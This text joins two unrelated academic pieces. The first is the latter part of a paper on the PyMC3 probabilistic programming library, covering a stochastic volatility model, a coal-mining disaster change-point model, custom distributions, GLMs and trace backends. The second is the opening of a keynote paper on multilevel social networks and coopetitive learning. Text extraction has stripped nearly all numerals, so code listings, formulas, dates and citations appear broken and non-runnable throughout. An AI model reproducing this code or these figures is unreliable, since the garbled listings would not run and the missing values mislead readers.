latent volatilities. in pymc , variables with positive support like exponential are transformed with a log transform, making sampling more robust. behind the scenes, the variable is transformed to the unconstrained space (named ‘‘variablename_log’’) and added to the model for sampling. 
in this model this happens behind the scenes for both the degrees of freedom, nu, and the scale parameter for the volatility process, sigma, since they both have exponential priors. variables with priors that are constrained on both sides, like beta or uniform, are also transformed to be unconstrained, here with a log odds transform. although (unlike model specification in pymc ) we do not typically provide starting points for variables at the model specification stage, it is possible to provide an initial value for any distribution (called a ‘‘test value’’ in theano) using the testval argument. this overrides the default test value for the distribution (usually the mean, median or mode of salvatier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the distribution), and is most often useful if some values are invalid and we want to ensure we select a valid one. the test values for the distributions are also used as a starting point for sampling and optimization by default, though this is easily overriden. the vector of latent volatilities s is given a prior distribution by a gaussianrandomwalk object. as its name suggests, gaussianrandomwalk is a vector-valued distribution where the values of the vector form a random normal walk of length n, as specified by the shape argument. the scale of the innovations of the random walk, sigma, is specified in terms of the precision of the normally distributed innovations and can be a scalar or vector. from pymc import exponential, studentt, exp, deterministic from pymc .distributions.timeseries import gaussianrandomwalk with model() as sp _model: nu = exponential(’nu’, ./ , testval= .) sigma = exponential(’sigma’, ./. , testval=. ) s = gaussianrandomwalk(’s’, sigma**- , shape=len(returns)) volatility_process = deterministic(’volatility_process’, exp(- *s)) r = studentt(’r’, nu, lam= /volatility_process, observed=returns[’s&p ’]) notice that we transform the log volatility process s into the volatility process by exp(- *s). here, exp is a theano function, rather than the corresponding function in numpy; theano provides a large subset of the mathematical functions that numpy does. also note that we have declared the model name sp _model in the first occurrence of the context manager, rather than splitting it into two lines, as we did for the first example. fitting before we draw samples from the posterior, it is prudent to find a decent starting value, by which we mean a point of relatively high probability. for this model, the full maximum a posteriori (map) point over all variables is degenerate and has infinite density. but, if we fix log_sigma and nu it is no longer degenerate, so we find the map with respect only to the volatility process s keeping log_sigma and nu constant at their default values (remember that we set testval=. for sigma). we use the limited-memory bfgs (l-bfgs) optimizer, which is provided by the scipy.optimize package, as it is more efficient for high dimensional functions; this model includes stochastic random variables (mostly from s). as a sampling strategy, we execute a short initial run to locate a volume of high probability, then start again at the new starting point to obtain a sample that can be used for inference. trace[- ] gives us the last point in the sampling trace. nuts will recalculate the scaling parameters based on the new point, and in this case it leads to faster sampling due to better scaling. import scipy with sp _model: salvatier et al. ( ), peerj comput. 
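a self-contained restatement of the volatility model described above; the prior rate parameters, test values, model name and the name of the returns column are assumed, illustrative choices, and returns is the pandas series loaded earlier:

from pymc3 import Model, Exponential, StudentT, Deterministic, exp
from pymc3.distributions.timeseries import GaussianRandomWalk

with Model() as sp500_model:
    # priors on the degrees of freedom and the random-walk innovation scale
    nu = Exponential('nu', 1. / 10, testval=5.)          # rate and testval assumed
    sigma = Exponential('sigma', 1. / 0.02, testval=0.1)

    # latent log-volatility path, one value per observed return
    s = GaussianRandomWalk('s', sigma ** -2, shape=len(returns))

    # deterministic transform from log-volatility to the scale of the returns
    volatility_process = Deterministic('volatility_process', exp(-2 * s))

    # student-t likelihood for the daily returns (column name assumed)
    r = StudentT('r', nu, lam=1 / volatility_process,
                 observed=returns['S&P500'])

expressing s as a gaussianrandomwalk ties each day's log-volatility to the previous day's value, which is what allows the model to track the rise in volatility during the crisis.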
sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. . . . . . . . fr eq ue nc y nu s am pl e va lu e nu . . . . . . . . fr eq ue nc y sigma . . . . . . . . s am pl e va lu e sigma figure posterior samples of degrees of freedom (nu) and scale (sigma) parameters of the stochastic volatility model. each plotted line repre- sents a single independent chain sampled in parallel. start = find_map(vars=[s], fmin=scipy.optimize.fmin_l_bfgs_b) step = nuts(scaling=start) trace = sample( , step, progressbar=false) # start next run at the last sampled position. step = nuts(scaling=trace[- ], gamma=. ) trace = sample( , step, start=trace[- ], progressbar=false, njobs= ) notice that the call to sample includes an optional njobs= argument, which enables the parallel sampling of chains (assuming that we have processors available). we can check our samples by looking at the traceplot for nu and sigma; each parallel chain will be plotted within the same set of axes (fig. ). traceplot(trace, [nu, sigma]); finally we plot the distribution of volatility paths by plotting many of our sampled volatility paths on the same graph (fig. ). each is rendered partially transparent (via the alpha argument in matplotlib’s plot function) so the regions where many paths overlap are shaded more darkly. fig, ax = plt.subplots(figsize=( , )) returns.plot(ax=ax) ax.plot(returns.index, /np.exp(trace[’s’,:: ].t), ’r’, alpha=. ); ax.set(title=’volatility_process’, xlabel=’time’, ylabel=’volatility’); ax.legend([’s&p ’, ’stochastic volatility process’]) as you can see, the model correctly infers the increase in volatility during the financial crash. it is worth emphasizing the complexity of this model due to its high dimensionality and dependency-structure in the random walk distribution. nuts as implemented in pymc , however, correctly infers the posterior distribution with ease. salvatier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. feb apr jun aug oc t de c feb apr jun aug time . . . . . . . vo la til ity volatility_process s&p stochastic volatility process figure posterior plot of volatility paths (red), alongside market data (blue). figure recorded counts of coal mining disasters in the uk, – . case study : coal mining disasters this case study implements a change-point model for a time series of recorded coal mining disasters in the uk from to (jarrett, ). the annual number of disasters is thought to have been affected by changes in safety regulations during this period, as can be seen in fig. . we have also included a pair of years with missing data, identified as missing by a numpy maskedarray using - as a sentinel value. salvatier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. our objective is to estimate when the change occurred, in the presence of missing data, using multiple step methods to allow us to fit a model that includes both discrete and continuous random variables. 
disaster_data = np.ma.masked_values([ , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , - , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , - , , , , , , , , , , , , , , , , , , , , , , , , , , , ], value=- ) year = np.arange( , ) plot(year, disaster_data, ’o’, markersize= ); ylabel("disaster count") xlabel("year") counts of disasters in the time series is thought to follow a poisson process, with a relatively large rate parameter in the early part of the time series, and a smaller rate in the later part. the bayesian approach to such a problem is to treat the change point as an unknown quantity in the model, and assign it a prior distribution, which we update to a posterior using the evidence in the dataset. in our model, dt ∼pois(rt ) rt = { l, if t < s e, if t ≥ s s∼unif(tl,th) e∼exp( ) l ∼exp( ) the parameters are defined as follows: • dt : the number of disasters in year t • rt : the rate parameter of the poisson distribution of disasters in year t. • s: the year in which the rate parameter changes (the switchpoint). • e: the rate parameter before the switchpoint s. • l: the rate parameter after the switchpoint s. • tl, th: the lower and upper boundaries of year t. from pymc import discreteuniform, poisson, switch with model() as disaster_model: switchpoint = discreteuniform(’switchpoint’, lower=year.min(), upper=year.max(), testval= ) # priors for pre- and post-switch rates number of disasters early_rate = exponential(’early_rate’, ) salvatier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. late_rate = exponential(’late_rate’, ) # allocate appropriate poisson rates to years before and after current rate = switch(switchpoint >= year, early_rate, late_rate) disasters = poisson(’disasters’, rate, observed=disaster_data) this model introduces discrete variables with the poisson likelihood and a discrete- uniform prior on the change-point s. our implementation of the rate variable is as a conditional deterministic variable, where its value is conditioned on the current value of s. rate = switch(switchpoint >= year, early_rate, late_rate) the conditional statement is realized using the theano function switch, which uses the first argument to select either of the next two arguments. missing values are handled concisely by passing a maskedarray or apandas.dataframe with nan values to the observed argument when creating an observed stochastic random variable. from this, pymc automatically creates another random variable, disasters.missing_values, which treats the missing values as unobserved stochastic nodes. all we need to do to handle the missing values is ensure we assign a step method to this random variable. unfortunately, because they are discrete variables and thus have no meaningful gradient, we cannot use nuts for sampling either switchpoint or the missing disaster observations. instead, we will sample using a metroplis step method, which implements self-tuning metropolis-hastings, because it is designed to handle discrete values. here, the sample function receives a list containing both the nuts and metropolis samplers, and sampling proceeds by first applying step then step at each iteration. from pymc import metropolis with disaster_model: step = nuts([early_rate, late_rate]) step = metropolis([switchpoint, disasters.missing_values[ ]] ) trace = sample( , step=[step , step ]) [----------------- %-----------------] of complete in . sec in the trace plot (fig. 
) we can see that there is about a year span that’s plausible for a significant change in safety, but a -year span that contains most of the probability mass. the distribution is jagged because of the jumpy relationship between the year switch-point and the likelihood and not due to sampling error. salvatier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. fr eq ue nc y switchpoint s am pl e va lu e switchpoint . . . . . . . . . . . . . . . . . . . fr eq ue nc y early_rate_log . . . . . . . . . s am pl e va lu e early_rate_log . . . . . . . . . . . . . . fr eq ue nc y late_rate_log . . . . . . s am pl e va lu e late_rate_log fr eq ue nc y disasters_missing s am pl e va lu e disasters_missing . . . . . . . . . . . . . . fr eq ue nc y early_rate . . . . . . s am pl e va lu e early_rate . . . . . . . . . . . . . . . fr eq ue nc y late_rate . . . . . . . s am pl e va lu e late_rate figure posterior distributions and traces from disasters change point model. salvatier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. pymc features arbitrary deterministic variables due to its reliance on theano, pymc provides many mathematical functions and operators for transforming random variables into new random variables. however, the library of functions in theano is not exhaustive, therefore pymc provides functionality for creating arbitrary theano functions in pure python, and including these functions in pymc models. this is supported with the as_op function decorator. import theano.tensor as t from theano.compile.ops import as_op @as_op(itypes=[t.lscalar], otypes=[t.lscalar]) def crazy_modulo (value): if value > : return value % else : return (-value + ) % with model() as model_deterministic: a = poisson(’a’, ) b = crazy_modulo (a) theano requires the types of the inputs and outputs of a function to be declared, which are specified for as_op by itypes for inputs and otypes for outputs. an important drawback of this approach is that it is not possible for theano to inspect these functions in order to compute the gradient required for the hamiltonian-based samplers. therefore, it is not possible to use the hmc or nuts samplers for a model that uses such an operator. however, it is possible to add a gradient if we inherit from theano.op instead of using as_op. arbitrary distributions the library of statistical distributions in pymc , though large, is not exhaustive, but pymc allows for the creation of user-defined probability distributions. for simple statistical distributions, the densitydist function takes as an argument any function that calculates a log-probability log(p(x)). this function may employ other parent random variables in its calculation. here is an example inspired by a blog post by vanderplas ( ), where jeffreys priors are used to specify priors that are invariant to transformation. in the case of simple linear regression, these are: β∝( +β ) / σ ∝ σ . the logarithms of these functions can be specified as the argument to densitydist and inserted into the model. salvatier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. import theano.tensor as t from pymc import densitydist, uniform with model() as model: alpha = uniform(’intercept’, - , ) # create custom densities beta = densitydist(’beta’, lambda value: - . 
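written out, the two jeffreys priors referred to above are presumably

\beta \propto \left(1 + \beta^{2}\right)^{-3/2}, \qquad \sigma \propto \frac{1}{\sigma},

whose logarithms contribute a term proportional to log(1 + beta^2) for the slope and -log(sigma) for the scale, consistent with the densitydist lambdas in the listing that follows.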
* t.log( + value** ), testval= ) eps = densitydist(’eps’, lambda value: -t.log(t.abs_(value)), testval= ) # create likelihood like = normal(’y_est’, mu=alpha + beta * x, sd=eps, observed=y) for more complex distributions, one can create a subclass of continuous or discrete and provide the custom logp function, as required. this is how the built-in distributions in pymc are specified. as an example, fields like psychology and astrophysics have complex likelihood functions for a particular process that may require numerical approximation. in these cases, it is impossible to write the function in terms of predefined theano operators and we must use a custom theano operator using as_op or inheriting from theano.op. implementing the beta variable above as a continuous subclass is shown below, along with a sub-function using the as_op decorator, though this is not strictly necessary. from pymc .distributions import continuous class beta(continuous): def __init__(self, mu, *args, **kwargs): super(beta, self).__init__(*args, **kwargs) self.mu = mu self.mode = mu def logp(self, value): mu = self.mu return beta_logp(value - mu) @as_op(itypes=[t.dscalar], otypes=[t.dscalar]) def beta_logp(value): return - . * np.log( + (value)** ) with model() as model: beta = beta(’slope’, mu= , testval= ) generalized linear models the generalized linear model (glm) is a class of flexible models that is widely used to estimate regression relationships between a single outcome variable and one or multiple predictors. because these models are so common, pymc offers a glm submodule that salvatier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. allows flexible creation of simple glms with an intuitive r-like syntax that is implemented via the patsy module. the glm submodule requires data to be included as a pandas dataframe. hence, for our linear regression example: # convert x and y to a pandas dataframe import pandas df = pandas.dataframe({’x ’: x , ’x ’: x , ’y’: y}) the model can then be very concisely specified in one line of code. from pymc .glm import glm with model() as model_glm: glm(’y ~ x + x ’, df) the error distribution, if not specified via the family argument, is assumed to be normal. in the case of logistic regression, this can be modified by passing in a binomial family object. from pymc .glm.families import binomial df_logistic = pandas.dataframe({’x ’: x , ’x ’: x , ’y’: y > }) with model() as model_glm_logistic: glm(’y ~ x + x ’, df_logistic, family=binomial()) models specified via glm can be sampled using the same sample function as standard pymc models. backends pymc has support for different ways to store samples from mcmc simulation, called backends. these include storing output in-memory, in text files, or in a sqlite database. by default, an in-memory ndarray is used but for very large models run for a long time, this can exceed the available ram, and cause failure. specifying a sqlite backend, for example, as the trace argument to sample will instead result in samples being saved to a database that is initialized automatically by the model. from pymc .backends import sqlite with model_glm_logistic: backend = sqlite(’logistic_trace.sqlite’) trace = sample( , metropolis(), trace=backend) [----------------- %-----------------] of complete in . 
sec a secondary advantage to using an on-disk backend is the portability of model output, as the stored trace can then later (e.g., in another session) be re-loaded using the load function: salvatier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. from pymc .backends.sqlite import load with basic_model: trace_loaded = load(’logistic_trace.sqlite’) discussion probabilistic programming is an emerging paradigm in statistical learning, of which bayesian modeling is an important sub-discipline. the signature characteristics of prob- abilistic programming–specifying variables as probability distributions and conditioning variables on other variables and on observations–makes it a powerful tool for building models in a variety of settings, and over a range of model complexity. accompanying the rise of probabilistic programming has been a burst of innovation in fitting methods for bayesian models that represent notable improvement over existing mcmc methods. yet, despite this expansion, there are few software packages available that have kept pace with the method- ological innovation, and still fewer that allow non-expert users to implement models. pymc provides a probabilistic programming platform for quantitative researchers to implement statistical models flexibly and succinctly. a large library of statistical distributions and several pre-defined fitting algorithms allows users to focus on the scientific problem at hand, rather than the implementation details of bayesian modeling. the choice of python as a development language, rather than a domain-specific language, means that pymc users are able to work interactively to build models, introspect model objects, and debug or profile their work, using a dynamic, high-level programming language that is easy to learn. the modular, object-oriented design of pymc means that adding new fitting algorithms or other features is straightforward. in addition, pymc comes with several features not found in most other packages, most notably hamiltonian-based samplers as well as automatical transforms of constrained random variables which is only offered by stan. unlike stan, however, pymc supports discrete variables as well as non-gradient based sampling algorithms like metropolis-hastings and slice sampling. development of pymc is an ongoing effort and several features are planned for future versions. most notably, variational inference techniques are often more efficient than mcmc sampling, at the cost of generalizability. more recently, however, black-box variational inference algorithms have been developed, such as automatic differentiation variational inference (advi) (kucukelbir et al., ). this algorithm is slated for addition to pymc . as an open-source scientific computing toolkit, we encourage researchers developing new fitting algorithms for bayesian models to provide reference implementations in pymc . since samplers can be written in pure python code, they can be implemented generally to make them work on arbitrary pymc models, giving authors a larger audience to put their methods into use. additional information and declarations funding the authors received no funding for this work. salvatier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. competing interests thomas v. wiecki is an employee of quantopian inc. john salvatier is an employee of ai impacts. author contributions • john salvatier, thomas v. 
author contributions
• john salvatier, thomas v. wiecki and christopher fonnesbeck conceived and designed the experiments, performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper.

data availability
the following information was supplied regarding data availability: https://github.com/pymc-devs/uq_chapter.

references
bastien f, lamblin p, pascanu r, bergstra j, goodfellow i, bergeron a, bouchard n, warde-farley d, bengio y. theano: new features and speed improvements. arxiv preprint.
behnel s, bradshaw r, citro c, dalcin l, seljebotn ds, smith k. cython: the best of both worlds. computing in science & engineering.
bergstra j, breuleux o, bastien f, lamblin p, pascanu r, desjardins g, turian j, warde-farley d, bengio y. theano: a cpu and gpu math expression compiler. in: proceedings of the python for scientific computing conference (scipy). austin: scipy. available at http://www.iro.umontreal.ca/~lisa/pointeurs/theano_ scipy .pdf.
duane s, kennedy ad, pendleton bj, roweth d. hybrid monte carlo. physics letters b.
goodman n, mansinghka v, roy d, bonawitz k, tarlow d. church: a language for generative models. arxiv preprint.
goodman nd, stuhlmüller a. the design and implementation of probabilistic programming languages. available at http://webppl.org/.
hoffman md, gelman a. the no-u-turn sampler: adaptively setting path lengths in hamiltonian monte carlo. journal of machine learning research.
jarrett r. a note on the intervals between coal-mining disasters. biometrika.
kucukelbir a, ranganath r, gelman a, blei d. automatic variational inference in stan. in: advances in neural information processing systems. red hook: curran & associates, inc.
kulkarni t, kohli p, tenenbaum j, mansinghka v. picture: an imperative probabilistic programming language for scene perception. available at https://mrkulk.github.io/www_cvpr / .pdf.
mansinghka v, selsam d, perov y. venture: a higher-order probabilistic programming platform with programmable inference. arxiv preprint.
minka t, winn j, guiver j, knowles d. infer.net. cambridge: microsoft research.
pfeffer a. figaro: a language for probabilistic programming. available at http://www.github.com/p t /figaro.
python software foundation. python language reference. available at http://www.python.org.
ritchie d. quicksand: a low-level probabilistic programming framework embedded in terra. available at http://dritchie.github.io/quicksand/.
spiegelhalter dj, thomas a, best ng, gilks wr. bugs: bayesian inference using gibbs sampling. cambridge: mrc biostatistics unit.
stan development team. stan: a c++ library for probability and sampling. available at http://mc-stan.org/.
vanderplas j. frequentism and bayesianism: a python-driven primer. arxiv preprint.
van der walt s, colbert sc, varoquaux g. the numpy array: a structure for efficient numerical computation. computing in science & engineering.
wood f, van de meent jw, mansinghka v. a new approach to probabilistic programming inference. in: proceedings of the international conference on artificial intelligence and statistics.

© author. this work is licensed under the creative commons attribution license (https://creativecommons.org/licenses/by/ . /).

connections | doi: . /connections- .

embarked on social processes (the rivers) in dynamic and multilevel networks (the boats)

emmanuel lazega*
institut d'etudes politiques de paris, iuf, cso-cnrs, rue amélie, paris, france.
*e-mail: emmanuel.lazega@sciencespo.fr
text of keynote presentation at the sunbelt xxxviii in utrecht. revised and resubmitted for publication in connections.

abstract
this paper is the written text underlying the keynote presentation at the sunbelt xxxviii in utrecht. it presents a neo-structural approach to social processes in the organizational society and the usefulness of the analyses of multilevel networks to understand how we navigate these processes and are made aware of them when we face cooperation dilemmas. empirical illustrations look at how multilevel networks and relational infrastructures are useful to research a process such as coopetitive learning in science, business and government. a conclusion focuses on the role of multilevel relational infrastructures in institutional entrepreneurship, social change and politics, as well as on our responsibility to develop our knowledge of these social processes and multilevel relational infrastructures as open science.

keywords
social processes, cooperation dilemmas, multilevel networks, multilevel relational infrastructures, coopetitive learning, institutional entrepreneurship, politics, open science, neo-structural sociology.

embarked on social processes in the organizational society

the main social processes in which sociology has been interested since the nineteenth century are solidarity and exclusion; deviance, control and conflict resolution; regulation and institutionalization; and learning and socialization. to say that these processes are social is to say that much of their deployment is always problematic and beyond our individual control. even when we can influence one of their episodes or components, we are embarked in/by them, cannot stop them, and necessarily navigate their tumultuous course with others. together, these processes can be considered to be social capital of the collective. navigating our course in these processes with others makes everyone interdependent, and interdependencies are thus too important to be left unorganized. we are thus reminded of this navigation each time we meet cooperation dilemmas. to manage these dilemmas, individuals and societies try to organize these interdependencies with structure and culture; for example, with relational infrastructures reflecting vertical differentiations (forms of status), horizontal differentiations (forms of division of work) and norms of behavior and exchanges associated with position in the structure created by these differentiations.
structure, culture and agency as analytically distinct operate in conjunction with each other and drive each other’s evolution. among indicators of these interdependencies, we find impersonal interactions and personalized relationships. today, the focus is on personalized relationships and relational infrastructures, especially multilevel relational infrastructures. we define rela- tionships as channels for resources and moral commitments with the exchange partners. specified by culture and agency, relationships combine into relational patterns and these patterns are the relational infrastructures shaping the social processes identified above. relational infrastructures are the backbones of certain forms of organized collective action and production, which we call collegial (not to be confused with congenial). since all the social processes connections identified above have a relational dimension, studying them from the perspective of this relational dimension adds to their sociological understanding. the study of the association between position in the social structure and behavior, as revisited by white et al. ( ) and developed in particular by insna members, has contributed to understanding this navigation. when personalized relationships are stabilized, they form relational infrastructures (for example, dimensions of status measured by centrality, or division of work approached with blockmodels) that both help members of the collective manage their cooperation dilemmas and constrain them. they represent complex opportunity and constraint structures (white, ) nested in social classes that, at some periods in history, facilitate mobilizations, accumulation and opportunity hoarding (tilly, ). this new structural analysis was bolstered during subsequent decades by specialized statistical models for networks as dependent variables. in these models exogenous effects, i.e. based for example on class, gender, ethnic affiliations, occupation, formal status, etc., bring into the picture the wider social context and its conflicts to understand and explain the formation of networks at different levels of granularity: dyadic (with p models, e.g., van duijn et al., ), triadic or higher order levels (with ergms, e.g., pattison and wasserman, ; snijders et al., ; wasserman and robins, ), and thus of relational infrastructures. this rigorous methodology has helped to analyze and to contextualize the deployment of the social processes and their navigation. further sophistication and stabilization of these analyses look at the co-evolution of these networks, behaviors, normative choices and positions (e.g. dynamics in snijders’, , ; snijders and steglich (forthcoming), analyses of longitudinal network data) where networks are both contexts and contextualized. this neo-structuralism recognizes that the management of interdependencies and cooperation dilemmas have certainly always been sophisticated and complex. however, as shown by modern sociologists – from weber ( ) to presthus ( ), coleman ( ), perrow ( ), lindenberg ( ), wittek ( ), wittek and van de bunt ( ), wittek and van witteloostuijn ( ) – the organization of interdependencies is today further characterized by the fact that we now live in an “organizational society.” in this organizational society, the meso-level of social order (and therefore the construction of the macro level) is dominated by those who control organizations as “tools with a life of their own” (selznick, , ) that tend to “absorb societal functions” (perrow, ). 
this perspective focuses the attention on the necessity to factor into the analyses – of relational interdependencies and infrastructures, social pro- cesses and their navigation – much more than in the recent past, the fact that society is stratified by superposed levels of organized collective action. the study of structure, culture and agency has to take this vertical, multilevel dimension of social phenomena much more into account. understanding navigation of social processes with the analyses of multilevel networks the concept of duality (breiger, ; further developed by fararo and doreian, and many others), in which individuals and groups/organizations co-constitute each other, is central to understand this vertical and multilevel dimension of the organizational society. in particular, it can mean that position in the organizational society is built from at least two levels of collective agency: inter-individual and inter- organizational. to revisit theories of tumultuous and often violent social processes and their collective navigation in the organizational society, we argue that it is useful to look at this navigation at least at two superposed levels of collective agency, simultaneously. a level is defined here as a system of collective agency with the same vertical and horizontal differentiations between members as those considered in the previous section (i.e. multiple dimensions of socio economic status and forms of division of work). actors at each level can be the individuals (affiliated in the organizations) or organizations (companies, government administrations, professions, associations, cooperatives, etc., affiliating individuals). individuals build relationships within and across organizational boundaries; and organizations build an inter-organizational field or system (industry, policy domain, etc.) in selznick’s ( ) sense of “dynamic configuring fields”. at each level, we find all the generic social processes and the relational infrastructures that help navigate them. each level can be represented as a network that is homogeneous with respect to type of actors, as in figure , and these structures can be analyzed as made up of units of analysis that are pairs of person-organization, in which the person is affiliated in the organization. in general terms, looking at the characteristics of such pairs helps to further understand position in the social structure, i.e. individuals dually positioned in superposed levels of collective agency. duality as co-constitution of one level with the other can be further modelled here using what snijders ( ) calls “analysis of multilevel networks” embarked on social processes in dynamic and multilevel networks (amn), as differentiated from “multilevel network analysis” (mna). in this approach, each level is context for the other and represents a form of collective agency (wasserman and iacobucci, ; parcel et al., ; lazega, ; lazega et al., ; lazega and snijders, ). such networks overlap and coevolve in complex ways, and these overlaps become indicators of meso-level context for individual relational strategies across boundaries, but also for the construction of macro-level structures (social stratification and inequalities). each level is context for the other. statistical models helping explore the emergence and determinants of such structures are provided, for example, by snijders and bosker ( ), koskinen et al. ( ), wang et al. ( , ), Žiberna ( ), Žiberna and lazega ( ), zappa and lomi ( ), tranmer et al. ( ). 
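to make the linked design described above concrete, the data structure behind an analysis of multilevel networks can be reduced to three matrices: one adjacency matrix per level and one affiliation matrix tying individuals to organizations, with the person-organization pair as the unit of analysis. the following toy sketch in python/numpy is our own illustration (the sizes and tie values are invented, not taken from the studies cited):

import numpy as np

n_people, n_orgs = 5, 3

# level one: inter-individual network (e.g., advice ties), people x people
advice = np.zeros((n_people, n_people), dtype=int)
advice[0, 1] = advice[1, 2] = advice[3, 4] = 1

# level two: inter-organizational network (e.g., resource exchanges), orgs x orgs
resources = np.zeros((n_orgs, n_orgs), dtype=int)
resources[0, 1] = resources[1, 2] = 1

# affiliation matrix: person i is a member of organization j
affiliation = np.zeros((n_people, n_orgs), dtype=int)
affiliation[[0, 1], 0] = 1
affiliation[[2, 3], 1] = 1
affiliation[4, 2] = 1

# the unit of analysis in amn: person-organization pairs
pairs = [(i, j) for i in range(n_people) for j in range(n_orgs) if affiliation[i, j]]
print(pairs)  # [(0, 0), (1, 0), (2, 1), (3, 1), (4, 2)]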
today i would like to report some of our explorations of how these multilevel dynamics work, based on datasets following this linked design. economic sociology offers many example of such forms of coopetition (brailly et al., , provide an overview), understood as paradoxical cooperative competition. they show how these overlap and their management always matter in understanding markets, more generally contexts where coopetition is vital. in this domain, this multilevel perspective has provided a new network boundary specification technique, as illustrated and developed by eloire ( ), eloire et al. ( ), penalva-icher ( ), oubenal ( ), piña-stranger and lazega ( ), brailly ( ), favre et al. ( ), who all look at how competitors cooperating in markets navigate social processes with relational infrastructures. first, they list all organizations active in the field of study, and their interdependencies. second, they list the main individuals who are affiliated in these organizations and know about the latters’ strategies, policies, interdependencies, exchanges, coordination efforts and capacity for resilience. this technique samples individuals, with all the limitations of samples, but is nevertheless useful as an exploratory technique when the researcher knows that the sample represents an organized community with inter-individual and inter-organizational collaborations. third, they elicit interdependencies between these individuals active in the field with data on their activities, division of work, specialties, productivity and performance. this approach has identified overlooked positions and processes, for example the position of vertical linchpins (actors who are active at two levels, simultaneously), dual alters, extended opportunity structures, multilevel matthew effects, etc. if multilevel agency and strategies become so visible in the organizational society, it is preci- sely because they help actors manage both inter- dependencies and conflicts with each other, i.e. coopetition. if the organizational society generalizes coopetition, it is also likely to encourage a form of reflexivity that makes multilevel agency an explicit concern. coopetition itself as an example of this general statement about social life, i.e. coorientation and coordination among actors who still jockey for positions and compete for resources, is as widespread as soccer games. however, in capitalist economies – where the lower the levels of social stratification, the figure : superposed levels of collective agency: inter-individual network, inter-organizational network, and affiliation network. in this multilevel, linked-design structure, the two levels are each made up of different types of units. in the analysis of multilevel networks (amn), as understood here, the unit of analysis is the individual-organization pair. (see ‘catching up with the big fish in the big pond’,social networks, , with marie jourda, lise mounier & rafael stofer) connections more open, direct and systematic the competition forced upon their members – coopetition acquires a different meaning. in many coopetitive fields, for example, individual employees are put in charge of seeking, on a personal basis, information and advice from other employees belonging to different, competing companies, thus figuring out ways for their respective companies to coordinate with one another, i.e. to become relatively friendly competitors instead of engaging in cutthroat competition. 
thus, a multilevel approach to collective action dynamics in the organizational and market society can identify ways in which companies compete in public, while their employees cooperate in private. in theory, one should deal with such broad issues process by process, relational infrastructure by relational infrastructure, each dataset bringing its additional insights. instead, i will focus here on one single process, coopetitive collective learning, in three different settings. this complexifies even further the tradition of studying learning through advice networks (see for example agneessens and wittek, ; barbillon et al., ; glückler et al., ; krackhardt, ; and many others). these case studies flesh out this multilevel perspective with the amn: the first looks at multilevel coopetition in science; the second in business; the third in government. in these cases, we identify the multilevel relational infrastructures that help coopetitors navigate the focal social process that makes collective action among rival peers possible. examples: navigating coopetitive learning in science, business and government the first example is a study of collective learning and coopetitive performance among public scientists, a population of top cancer researchers in france in − . this case in point focuses on collective learning among highly competitive actors. all are part of science as a multilevel production system with collective action at each level. individuals are researchers, all “sublime” in different ways (eight papers per year in internationally visible journals scanned by cancerlit – later merged into pubmed – for three years in a row between and ). they work in different research laboratories. the two different levels of collective agency are, first, five different inter- individual level advice networks supporting the work of these scientists; and second the inter-organizational level captured by seven networks of resource interdependencies between laboratories (recruitment of postdocs, shared expen sive technology, joint funding and research projects, etc.) supporting the collective projects of these respective organizations. the dominant specialty is still hematology-immunology that was able to associate more systematically with fundamental research since the s. indeed, more than a generation earlier, they had collectively won a race to learn and appropriate molecular biology, and to coopetitively share their experience of using its techniques . multilevel position and relational infrastructures multilevel relational infrastructures, especially multi level status, mainly helped specific researchers navigate the coopetitive learning process. here we roughly identify high and low multi-level status by taking the median in indegrees between individuals (i.e. central – the big fish) and less central (the little fish, below the median), and the same for organizations, combined with size (the big and the small ponds). we can thus identify four positions in multilevel status: the big fish in the big ponds (bfbp), the bfsp, the lfbp and the lfsp. on average performances of these categories differ. impact factor (if) scores are unreliable as measurement of quality of work, but it is nevertheless interesting in our exploratory approach to look at what story they tell. this story is that performances of the bfbp are higher, which is no scoop, but also that over time only the lfbp catch up with the bfbp . 
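as a concrete reading of the four multilevel-status categories introduced above, the classification can be reproduced with a simple median split at each level. the sketch below is our own toy illustration (invented indegrees and affiliations, and indegree alone where the study also combines centrality with laboratory size), not code from the study:

import numpy as np

# toy inputs (invented): indegrees of five researchers in the advice network,
# indegrees of their three laboratories in the inter-organizational network,
# and the laboratory each researcher belongs to
person_indegree = np.array([8, 2, 5, 1, 7])
org_indegree = np.array([6, 1, 4])
org_of_person = np.array([0, 0, 1, 2, 1])

big_fish = person_indegree > np.median(person_indegree)   # above-median individuals
big_pond = org_indegree > np.median(org_indegree)          # above-median organizations

labels = []
for person, org in enumerate(org_of_person):
    fish = 'bf' if big_fish[person] else 'lf'
    pond = 'bp' if big_pond[org] else 'sp'
    labels.append(fish + pond)

print(labels)  # ['bfbp', 'lfbp', 'lfsp', 'lfsp', 'bfsp']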
